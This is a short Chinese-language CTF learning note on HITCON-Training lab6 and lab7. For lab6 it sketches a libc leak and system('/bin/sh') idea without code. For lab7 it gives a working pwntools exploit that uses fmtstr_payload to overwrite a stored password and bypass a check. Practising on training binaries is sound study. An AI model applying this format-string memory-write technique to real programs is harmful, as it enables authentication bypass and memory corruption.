第四条鱼生病啦
所以没有第四条
啊我个菜鸡
https://github.com/scwuaptx/HITCON-Training的lab6和lab7
lab6 migration
首先这个。。。。
啊呀没得思路
不管了先扔Ida总不会错的
然后把能找的都找出来
有个思路是利用puts函数输出函数的地址然后再用libc找system构造system(\bin\sh)来做 然而我并不能写出exp
之后想想emmm
lab7 crack
Ida
可以看出来这是一个格式化字符串的题
然后发现参数在第十个
exp利用fmtstr_payload函数,这个函数的作用是用来生成格式化字符串漏洞写内存的payload.具体https://paper.seebug.org/246/
大概思路是把password修改成“1”
然后再次输入的时候就输入1 这样字符就相等啦
我真是个小机灵鬼
from pwn import *
sh=process('./crack')
psw_adr=0x0804A048
p1=fmtstr_payload(10,{psw_adr:1})
p2='1'
sh.recvuntil('What your name ? ')
sh.sendline(p1)
sh.recvuntil("Your password :")
sh.sendline(p2)
sh.interactive()
然而
呸